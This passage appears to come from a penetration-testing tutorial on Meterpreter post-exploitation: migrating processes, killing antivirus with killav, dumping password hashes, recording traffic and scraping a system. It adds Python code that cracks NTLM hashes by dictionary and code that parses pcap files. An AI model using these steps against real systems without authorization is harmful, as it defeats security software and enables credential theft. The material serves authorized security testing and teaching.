Meterpreter
[*] Migrating to explorer.exe...
[*] Migrating into process ID 816
[*] New server process: Explorer.EXE (816)
Killing Antivirus Software
Antivirus software can block certain tasks. During penetration tests, we have seen "smarter" antivirus or host-based intrusion prevention products block our ability to run certain attack vectors. In such cases, we can run the killav script to stop the processes preventing our tasks from running. The script compares the names of running processes against a built-in list of known antivirus and security products and kills every match, so it does nothing against a product whose process name is not on that list or whose processes cannot be terminated from our current privilege level, and the resulting service stops and alerts are easy for a defender to notice.
meterpreter > run killav
[*] Killing Antivirus services on the target...
[*] Killing off cmd.exe...
[*] Killing off cmd.exe...
Obtaining System Password Hashes
Obtaining a copy of the system's password hashes allows us to run pass-the-hash attacks or to brute force the hash to reveal the plain-text password. The script reads the SAM database from the registry and needs SYSTEM privileges, so run getsystem first if the session is not already running as SYSTEM. We can obtain the password hashes with the run hashdump command:
meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY de4b35306c5f595438a2f78f768772d2...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
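Each line of hashdump output has the pwdump layout username:RID:LM hash:NTLM hash:::. The LM field is worth checking before cracking: the value aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty string and means no LM hash is stored, while any other value is cheap to crack. The NTLM hash is MD4 over the UTF-16LE password, which makes a dictionary check easy to write. The following is an added example, not from the book or from Metasploit: it parses hashdump lines, flags stored LM hashes and blank passwords, and verifies candidate passwords with a pure-Python MD4 (hashlib's md4 is often unavailable on OpenSSL 3 builds). The Administrator line is the one printed above; the Guest and svc_backup lines and the wordlist are constructed for the example.

```python
import struct

# Constructed sample: the Administrator line as printed by hashdump above,
# plus two extra accounts invented for this example.
SAMPLE_HASHDUMP = """\
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""

# LM hash of an empty string (no LM hash stored) and NTLM hash of an empty string
# (blank password).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"


def parse_hashdump(text):
    """Parse pwdump-style lines (user:rid:lm:nt:::) into dicts."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.count(":") < 3:
            continue
        user, rid, lm, nt = line.split(":")[:4]
        lm, nt = lm.lower(), nt.lower()
        records.append({
            "user": user,
            "rid": int(rid),
            "lm": lm,
            "nt": nt,
            "lm_stored": lm != EMPTY_LM,  # a real LM hash is present: cheap to crack
            "blank": nt == EMPTY_NT,      # account has an empty password
        })
    return records


def md4(data):
    """Pure-Python MD4 as specified in RFC 1320; returns the 16-byte digest."""
    mask = 0xFFFFFFFF
    rotl = lambda x, s: ((x << s) | (x >> (32 - s))) & mask
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    # Padding: 0x80, zeros to 56 mod 64, then the bit length as a little-endian u64.
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    rounds = (
        (f, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        v = list(state)
        for func, const, order, shifts in rounds:
            for i in range(16):
                idx = (-i) % 4  # rotate through a, d, c, b
                val = v[idx] + func(v[(idx + 1) % 4], v[(idx + 2) % 4], v[(idx + 3) % 4]) + x[order[i]] + const
                v[idx] = rotl(val & mask, shifts[i % 4])
        state = [(s + w) & mask for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def ntlm_hash(password):
    """NT hash = MD4(UTF-16LE(password)), as a lowercase hex string."""
    return md4(password.encode("utf-16-le")).hex()


def crack_ntlm(records, wordlist):
    """Dictionary check: map each user whose NT hash matches a candidate to that password."""
    table = {ntlm_hash(w): w for w in wordlist}
    return {r["user"]: table[r["nt"]] for r in records if r["nt"] in table}


if __name__ == "__main__":
    recs = parse_hashdump(SAMPLE_HASHDUMP)
    for r in recs:
        print(r["user"], "LM stored" if r["lm_stored"] else "no LM", "BLANK" if r["blank"] else "")
    print(crack_ntlm(recs, ["letmein", "password", ""]))  # constructed wordlist
```

Running the script recovers the Administrator password from the hash shown above and reports Guest as a blank-password account; the LM hash on the Administrator line is a second, weaker target for the same password, which is why an LM hash other than the empty-string value is worth noting before choosing a cracking strategy.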
Viewing All Traffic on a Target Machine
To see all traffic on a target, we can run a packet recorder. Everything captured by packetrecorder is saved in the .pcap file format to be parsed with a tool such as Wireshark. In this listing, we run the packetrecorder script with the -i 1 option, which specifies which interface we want to use to perform the packet captures (run packetrecorder -li first to list the interface numbers available on the target):
meterpreter > run packetrecorder -i 1
[*] Starting Packet capture on interface 1
[*] Packet capture started
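When Wireshark is not at hand, the classic pcap format that packetrecorder writes is simple enough to triage by hand: a 24-byte global header (magic, version, snaplen, link type) followed by records, each with a 16-byte header (timestamp, captured length, original length) and the raw frame. The following is an added example, not code from the book or from Metasploit: it builds a constructed one-frame Ethernet/IPv4/UDP capture in memory (addresses and payload invented for the example) and parses it the way a quick triage script would, detecting byte order from the magic and stopping cleanly on a truncated file. It handles only classic pcap with Ethernet link type, not pcapng or the nanosecond-timestamp variant.

```python
import socket
import struct

PCAP_MAGIC_LE = b"\xd4\xc3\xb2\xa1"   # 0xa1b2c3d4 stored little-endian (the usual case)
PCAP_MAGIC_BE = b"\xa1\xb2\xc3\xd4"
LINKTYPE_ETHERNET = 1
IP_PROTO_NAMES = {1: "icmp", 6: "tcp", 17: "udp"}


def build_sample_pcap():
    """Constructed capture: one Ethernet/IPv4/UDP frame to port 53, standing in
    for a file written by packetrecorder. Everything here is invented sample data."""
    payload = b"\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"  # start of a DNS query header
    udp = struct.pack("!HHHH", 49152, 53, 8 + len(payload), 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 1, 0, 64, 17, 0,
                     socket.inet_aton("10.0.0.5"), socket.inet_aton("10.0.0.1")) + udp
    frame = b"\x00\x11\x22\x33\x44\x55" + b"\x66\x77\x88\x99\xaa\xbb" + b"\x08\x00" + ip
    global_hdr = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    rec_hdr = struct.pack("<IIII", 1_700_000_000, 0, len(frame), len(frame))
    return global_hdr + rec_hdr + frame


def parse_pcap(data):
    """Walk a classic pcap file and return one summary dict per frame."""
    magic = data[:4]
    if magic == PCAP_MAGIC_LE:
        end = "<"
    elif magic == PCAP_MAGIC_BE:
        end = ">"
    else:
        raise ValueError("not a classic pcap file (magic %s)" % magic.hex())
    _major, _minor, _tz, _sig, _snaplen, linktype = struct.unpack(end + "HHiIII", data[4:24])
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError("unsupported link type %d" % linktype)

    frames, off = [], 24
    while off + 16 <= len(data):
        ts_sec, ts_usec, incl_len, orig_len = struct.unpack(end + "IIII", data[off:off + 16])
        off += 16
        pkt = data[off:off + incl_len]
        if len(pkt) < incl_len:   # file cut short mid-record: stop rather than mis-parse
            break
        off += incl_len
        summary = {"ts": ts_sec + ts_usec / 1e6, "len": orig_len, "truncated": incl_len < orig_len}
        ethertype = struct.unpack("!H", pkt[12:14])[0] if len(pkt) >= 14 else None
        if ethertype == 0x0800 and len(pkt) >= 34:
            ihl = (pkt[14] & 0x0F) * 4          # IPv4 header length in bytes
            proto = pkt[23]
            summary.update(src=socket.inet_ntoa(pkt[26:30]), dst=socket.inet_ntoa(pkt[30:34]),
                           proto=IP_PROTO_NAMES.get(proto, str(proto)))
            l4 = pkt[14 + ihl:]
            if proto in (6, 17) and len(l4) >= 4:
                summary["sport"], summary["dport"] = struct.unpack("!HH", l4[:4])
        else:
            summary["ethertype"] = ethertype
        frames.append(summary)
    return frames


if __name__ == "__main__":
    for fr in parse_pcap(build_sample_pcap()):
        print(fr)
```

To use it on a real capture, replace build_sample_pcap() with the bytes of the file packetrecorder downloaded; the summaries give enough (source, destination, protocol, ports) to spot which flows deserve a full decode.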
Scraping a System
The scraper script enumerates just about everything you could ever want from a system. It will grab the usernames and passwords, download the entire registry, dump password hashes, gather system information, and export the HKEY_CURRENT_USER (HKCU) hive.